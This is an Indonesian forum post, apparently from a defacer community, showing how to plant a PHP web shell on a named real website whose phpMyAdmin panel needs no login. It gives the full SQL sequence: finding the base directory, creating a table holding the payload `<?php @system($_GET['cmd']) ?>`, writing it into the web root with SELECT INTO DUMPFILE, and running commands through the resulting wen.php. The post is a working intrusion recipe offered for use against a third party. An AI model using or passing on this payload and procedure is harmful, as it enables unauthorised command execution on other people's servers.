ide ini muncul dari postingan om adioranye setelah nyari-nyari target ke sana ke mari kayak cacing yang kepanasan r0~f> penasaran gw karna pernah dipost om ketek cara upload shell dari phpmyadmin
yang pake select * into outfile 'root_directory'
oke gak usah banyak basa-basi langsung aja kita coba targetnya ya
coba buka deh neh
Code:
http://gwsl.co.uk/phpmyadmin/phpmyadminnya bisa dibuka kan :mrgreen: tanpa pake user+pass mungkin admin nya lagi putus cinta atau lagi kesel ama pacarnya jadi situsnya gak diperhatiin kebanyakan perhatiin tuh cewe
langkah pertama kita harus tau di mana posisi root directory
coba kasi perintah di SQL seperti ini
Code:
SHOW VARIABLES
maka akan muncul basedir
Code:
basedir C:\Program Files\OrangeHRM\2.4.1\mysql\
menurut teropong mama lorent direktorynya ada di
Code:
C:/Program Files/OrangeHRM/2.4.1/htdocs
nah kalau udah tau letak direktory udah dapat tinggal buat database baru dengan nama shell
udah pada ngerti kan semua pake phpmyadmin
setelah dibuat database dengan nama shell di dalam database itu buat table baru dengan mengetikkan perintah
Code:
CREATE TABLE wen(
stack TEXT
) TYPE=MYISaM ;
INSERT INTO wen(stack) VALUES('<pre><body bgcolor=silver><?php @system($_GET["cmd"]) ?> </body></pre>');
maka table aka terbentuk di dalam table tadi yang bernama wen ketikan perintah sql
Code:
select * into dumpfile 'C:/Program Files/OrangeHRM/2.4.1/htdocs/wen.php' from wen
kita sudah membuat file baru dengan nama
Code:
wen.php
untuk menjalankan shell tinggal buka aja
http://gwsl.co.uk/wen.php?cmd=dirthanks to tey (my best friend) , inc0mpl3t3 ( untuk videonya ) , vires and netheroes crew , mr_mywisdom ( udah sehat lum ? ) dan anak2 gorontalodefacer yg gokil ( gman nih forumnya kok lum bisa dibuka)